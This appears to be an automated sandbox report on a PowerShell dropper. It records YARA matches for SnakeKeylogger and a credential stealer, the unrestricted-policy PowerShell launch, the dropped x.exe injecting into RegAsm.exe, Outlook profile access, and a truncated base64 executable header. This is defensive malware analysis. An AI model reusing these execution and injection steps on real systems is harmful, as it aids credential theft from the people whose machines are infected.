Source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5088, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: x.exe PID: 1428, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: x.exe.0.dr

Static PE information: Section: 6Fd:c# ZLIB complexity 1.0003925398284315

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winPS1@6/7@3/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1468:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxcbnnbs.ryi.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: RegAsm.exe, 00000005.00000002.3418127650.00000000029DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3420481730.000000000390D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.00000000029FF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: jqxrkk.ps1

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAL

Source: x.exe.0.dr

Static PE information: 0xA177E0B7 [Fri Nov 5 00:41:27 2055 UTC]

Source: x.exe.0.dr	Static PE information: section name: 6Fd:c#
Source: x.exe.0.dr	Static PE information: section name:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFD345600BD pushad ; iretd

0_2_00007FFD345600C1

Source: x.exe.0.dr

Static PE information: section name: 6Fd:c# entropy: 7.99799588046591

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
